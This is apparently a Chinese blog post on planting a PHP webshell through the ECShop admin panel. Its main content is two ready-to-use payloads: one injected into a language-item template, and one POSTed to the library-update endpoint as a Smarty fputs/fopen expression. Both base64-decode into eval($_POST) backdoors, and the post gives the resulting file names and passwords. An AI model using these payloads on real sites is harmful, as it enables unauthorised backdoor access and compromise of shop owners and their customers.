Ecshop后台update覆盖写shell

好大一条虫 312 次浏览 0

前言:ECSHOP过滤了 转义 <--?php ?--> 测试了网上各种的办法,无果。只保留两种办法以备参考

0x1 MYSQL执行语句select INTO、echo、就会报错 提示导出失败 如下 (数据库权限为root) 具体也看了下别人的分析文章

The MySQL server is running with the --secure-file-priv option so it cannot execute this statement

mysql导出导入文件问题整理

0x2 TEST GET SHELL
(1)模版管理 - 语言项编辑 - 用户信息

${${fputs(fopen(base64_decode(cGNzbGkucGhw),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbcGNzbGldKT8+))}}

访问user.php 根目录生成pcsli.php 码为:pcsli (这类型的办法个别站点会出错,有几率访问user.php 出现500 server 的情况)

(2)ECSHOP采用的是smarty 通过fetch模块执行获取权限(2013年的老办法解决我所碰到的问题)

POST
/admin/template.php?act=update_library
HOST:localhost
内容:
lib=recommend_best&html={if fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}16086{/if}

Ecshop后台update覆盖写shell
访问:http://localhost/index.php?act=cat_rec
根目录下生成demo.php 密码:c
Ecshop后台update覆盖写shell

发表评论 取消回复
表情 图片 链接 代码